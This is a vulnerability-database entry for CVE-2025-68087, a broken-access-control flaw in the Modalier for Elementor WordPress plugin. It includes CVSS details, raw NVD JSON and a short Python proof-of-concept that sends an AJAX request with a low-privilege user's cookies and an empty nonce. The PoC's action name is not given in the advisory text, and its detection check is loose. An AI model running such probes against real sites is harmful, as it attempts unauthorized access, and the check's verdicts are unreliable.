Security Vulnerability Report
中文
CVE-2025-68087 CVSS 5.4 MEDIUM

CVE-2025-68087

Published: 2025-12-16 09:16:04
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in merkulove Modalier for Elementor modalier-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Modalier for Elementor: from n/a through <= 1.0.6.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Modalier for Elementor <= 1.0.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68087 PoC - Modalier for Elementor Broken Access Control # Requires authenticated user with subscriber+ privileges import requests import sys TARGET_URL = "https://target-site.com/wp-admin/admin-ajax.php" COOKIES = { "wordpress_test_cookie": "WP+Cookie+check", "wordpress_logged_in_[HASH]": "user_token" } def check_vulnerability(): """Check if the target is vulnerable to CVE-2025-68087""" # Test unauthorized access to admin functions data = { "action": "modalier_get_modals", "nonce": "", "post_id": 1 } try: response = requests.post(TARGET_URL, data=data, cookies=COOKIES, timeout=10) if response.status_code == 200: # Check if response contains protected data if "modalier" in response.text.lower() or response.json(): print("[+] Target is potentially vulnerable!") print(f"[+] Response: {response.text[:500]}") return True print("[-] Target may not be vulnerable") return False except Exception as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": print("CVE-2025-68087 Modalier for Elementor PoC") print("=" * 50) check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68087", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:16:03.907", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in merkulove Modalier for Elementor modalier-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Modalier for Elementor: from n/a through <= 1.0.6."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/modalier-elementor/vulnerability/wordpress-modalier-for-elementor-plugin-1-0-6-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}